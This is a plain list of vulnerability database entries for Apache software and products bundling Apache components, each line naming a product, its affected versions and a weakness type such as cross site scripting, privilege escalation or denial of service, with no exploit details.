| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
| [74468] Apache Batik up to 1.6 denial of service
| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
| [74174] Apache WSS4J up to 2.0.0 privilege escalation
| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
| [73731] Apache XML Security unknown vulnerability
| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
| [73593] Apache Traffic Server up to 5.1.0 denial of service
| [73511] Apache POI up to 3.10 Deadlock denial of service
| [73510] Apache Solr up to 4.3.0 cross site scripting
| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
| [73173] Apache CloudStack Stack-Based unknown vulnerability
| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
| [72890] Apache Qpid 0.30 unknown vulnerability
| [72887] Apache Hive 0.13.0 File Permission privilege escalation
| [72878] Apache Cordova 3.5.0 cross site request forgery
| [72877] Apache Cordova 3.5.0 cross site request forgery
| [72876] Apache Cordova 3.5.0 cross site request forgery
| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
| [71629] Apache Axis2/C spoofing
| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
| [70809] Apache POI up to 3.11 Crash denial of service
| [70808] Apache POI up to 3.10 unknown vulnerability
| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
| [70749] Apache Axis up to 1.4 getCN spoofing
| [70701] Apache Traffic Server up to 3.3.5 denial of service
| [70700] Apache OFBiz up to 12.04.03 cross site scripting
| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
| [70661] Apache Subversion up to 1.6.17 denial of service
| [70660] Apache Subversion up to 1.6.17 spoofing
| [70659] Apache Subversion up to 1.6.17 spoofing
| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
| [69846] Apache HBase up to 0.94.8 information disclosure
| [69783] Apache CouchDB up to 1.2.0 memory corruption
| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
| [69431] Apache Archiva up to 1.3.6 cross site scripting
| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
| [66739] Apache Camel up to 2.12.2 unknown vulnerability
| [66738] Apache Camel up to 2.12.2 unknown vulnerability
| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
| [66695] Apache CouchDB up to 1.2.0 cross site scripting
| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
| [66356] Apache Wicket up to 6.8.0 information disclosure
| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
| [65668] Apache Solr 4.0.0 Updater denial of service
| [65665] Apache Solr up to 4.3.0 denial of service
| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
| [65410] Apache Struts 2.3.15.3 cross site scripting
| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
| [65340] Apache Shindig 2.5.0 information disclosure
| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
| [10826] Apache Struts 2 File privilege escalation
| [65204] Apache Camel up to 2.10.1 unknown vulnerability
| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
| [64722] Apache XML Security for C++ Heap-based memory corruption
| [64719] Apache XML Security for C++ Heap-based memory corruption
| [64718] Apache XML Security for C++ verify denial of service
| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
| [64716] Apache XML Security for C++ spoofing
| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
| [64485] Apache Struts up to 2.2.3.0 privilege escalation
| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
| [64467] Apache Geronimo 3.0 memory corruption
| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
| [64457] Apache Struts up to 2.2.3.0 cross site scripting
| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
| [9184] Apache Qpid up to 0.20 SSL misconfiguration
| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
| [8873] Apache Struts 2.3.14 privilege escalation
| [8872] Apache Struts 2.3.14 privilege escalation
| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
| [64006] Apache ActiveMQ up to 5.7.0 denial of service
| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
| [8427] Apache Tomcat Session Transaction weak authentication
| [63960] Apache Maven 3.0.4 Default Configuration spoofing
| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
| [63750] Apache qpid up to 0.20 checkAvailable denial of service
| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
| [63747] Apache Rave up to 0.20 User Account information disclosure
| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
| [7687] Apache CXF up to 2.7.2 Token weak authentication
| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
| [63090] Apache Tomcat up to 4.1.24 denial of service
| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
| [62833] Apache CXF -/2.6.0 spoofing
| [62832] Apache Axis2 up to 1.6.2 spoofing
| [62831] Apache Axis up to 1.4 Java Message Service spoofing
| [62830] Apache Commons-httpclient 3.0 Payments spoofing
| [62826] Apache Libcloud up to 0.11.0 spoofing
| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
| [62661] Apache Axis2 unknown vulnerability
| [62658] Apache Axis2 unknown vulnerability
| [62467] Apache Qpid up to 0.17 denial of service
| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
| [6301] Apache HTTP Server mod_pagespeed cross site scripting
| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
| [62035] Apache Struts up to 2.3.4 denial of service
| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
| [61229] Apache Sling up to 2.1.1 denial of service
| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
| [61094] Apache Roller up to 5.0 cross site scripting
| [61093] Apache Roller up to 5.0 cross site request forgery
| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
| [60708] Apache Qpid 0.12 unknown vulnerability
| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
